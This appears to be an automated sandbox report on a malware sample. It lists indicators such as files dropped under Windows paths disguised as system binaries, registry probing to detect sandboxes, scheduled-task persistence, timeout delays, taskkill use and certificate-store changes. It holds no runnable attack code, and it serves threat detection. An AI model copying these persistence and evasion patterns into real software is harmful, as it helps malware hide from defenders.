File created	C:\Program Files (x86)\Picture Lab\is-2UE1C.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-AKQ5S.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-N1U1H.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-5MOV4.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-09ELF.tmp	vpn.tmp

Drops file in Windows directory 32 IoCs

Processes:

Setup.tmpSetup.tmpSetup.tmpSetup.tmpSetup.tmpapp.exeDrvInst.exemultitimer.exesvchost.exeMicrosoftEdge.execsrss.exeDrvInst.exetapinstall.exeMicrosoftEdge.exeWerFault.exeMicrosoftEdge.exe

description	ioc	process
File created	C:\Windows\is-UI8SV.tmp	Setup.tmp
File created	C:\Windows\is-7DVE5.tmp	Setup.tmp
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\is-ADS3K.tmp	Setup.tmp
File created	C:\Windows\is-TBPDD.tmp	Setup.tmp
File created	C:\Windows\rss\csrss.exe	app.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\rss	app.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\is-4FO9G.tmp	Setup.tmp
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\is-5TOUP.tmp	Setup.tmp
File created	C:\Windows\is-PDN7V.tmp	Setup.tmp
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File created	C:\Windows\is-LH9S1.tmp	Setup.tmp
File created	C:\Windows\is-LS9QG.tmp	Setup.tmp
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\is-A50MT.tmp	Setup.tmp
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 48 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4124	2924	WerFault.exe	tilwiw1t4uk.exe
3600	2924	WerFault.exe	tilwiw1t4uk.exe
5348	2924	WerFault.exe	tilwiw1t4uk.exe
5540	2924	WerFault.exe	tilwiw1t4uk.exe
5844	2924	WerFault.exe	tilwiw1t4uk.exe
4732	2924	WerFault.exe	tilwiw1t4uk.exe
5572	2924	WerFault.exe	tilwiw1t4uk.exe
4260	2924	WerFault.exe	tilwiw1t4uk.exe
4460	4264	WerFault.exe	h9HCatah8.exe
4284	4264	WerFault.exe	h9HCatah8.exe
1132	2376	WerFault.exe	Setup.exe
5800	4264	WerFault.exe	h9HCatah8.exe
6280	4264	WerFault.exe	h9HCatah8.exe
6292	2376	WerFault.exe	Setup.exe
6408	4264	WerFault.exe	h9HCatah8.exe
6444	2376	WerFault.exe	Setup.exe
6716	2376	WerFault.exe	Setup.exe
6732	4264	WerFault.exe	h9HCatah8.exe
6892	6824	WerFault.exe	rBSob1N4b.exe
6936	2376	WerFault.exe	Setup.exe
7016	4264	WerFault.exe	h9HCatah8.exe
7080	6824	WerFault.exe	rBSob1N4b.exe
7160	4264	WerFault.exe	h9HCatah8.exe
6168	2376	WerFault.exe	Setup.exe
6344	6824	WerFault.exe	rBSob1N4b.exe
2524	2376	WerFault.exe	Setup.exe
2368	6824	WerFault.exe	rBSob1N4b.exe
6528	4264	WerFault.exe	h9HCatah8.exe
6708	2376	WerFault.exe	Setup.exe
7036	4264	WerFault.exe	h9HCatah8.exe
6920	6824	WerFault.exe	rBSob1N4b.exe
6212	6824	WerFault.exe	rBSob1N4b.exe
4436	4264	WerFault.exe	h9HCatah8.exe
6512	2376	WerFault.exe	Setup.exe
6584	4264	WerFault.exe	h9HCatah8.exe
5340	6824	WerFault.exe	rBSob1N4b.exe
1516	2376	WerFault.exe	Setup.exe
6368	6824	WerFault.exe	rBSob1N4b.exe
6500	2376	WerFault.exe	Setup.exe
6456	4264	WerFault.exe	h9HCatah8.exe
6772	6824	WerFault.exe	rBSob1N4b.exe
6608	2376	WerFault.exe	Setup.exe
7000	6824	WerFault.exe	rBSob1N4b.exe
5748	2376	WerFault.exe	Setup.exe
640	6824	WerFault.exe	rBSob1N4b.exe
6984	4264	WerFault.exe	h9HCatah8.exe
6488	2376	WerFault.exe	Setup.exe
6784	6824	WerFault.exe	rBSob1N4b.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

tapinstall.exesvchost.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exesvchost.exeDrvInst.exeWerFault.exeDrvInst.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	C0CA61A12E4C8B38.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	WerFault.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	tapinstall.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	tapinstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	C0CA61A12E4C8B38.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

CC6E.tmp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CC6E.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CC6E.tmp.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

6172 schtasks.exe
6268 schtasks.exe
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

8040 timeout.exe
8752 timeout.exe
4720 timeout.exe
6756 timeout.exe
7368 timeout.exe

pid	process
6172	schtasks.exe
6268	schtasks.exe

pid	process
8040	timeout.exe
8752	timeout.exe
4720	timeout.exe
6756	timeout.exe
7368	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 8 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	1660	Go-http-client/1.1
HTTP User-Agent header	1662	Go-http-client/1.1
HTTP User-Agent header	1663	Go-http-client/1.1
HTTP User-Agent header	1823	Go-http-client/1.1
HTTP User-Agent header	1828	Go-http-client/1.1
HTTP User-Agent header	1830	Go-http-client/1.1
HTTP User-Agent header	1831	Go-http-client/1.1
HTTP User-Agent header	1658	Go-http-client/1.1

Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3464 taskkill.exe
1336 taskkill.exe
4844 taskkill.exe
4048 taskkill.exe
984 taskkill.exe
7328 taskkill.exe
8096 taskkill.exe

pid	process
3464	taskkill.exe
1336	taskkill.exe
4844	taskkill.exe
4048	taskkill.exe
984	taskkill.exe
7328	taskkill.exe
8096	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

Processes:

browser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exebrowser_broker.exeMicrosoftEdge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exemask_svc.exeDrvInst.exeapp.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2182 = "Astrakhan Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2322 = "Sakhalin Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	csrss.exe
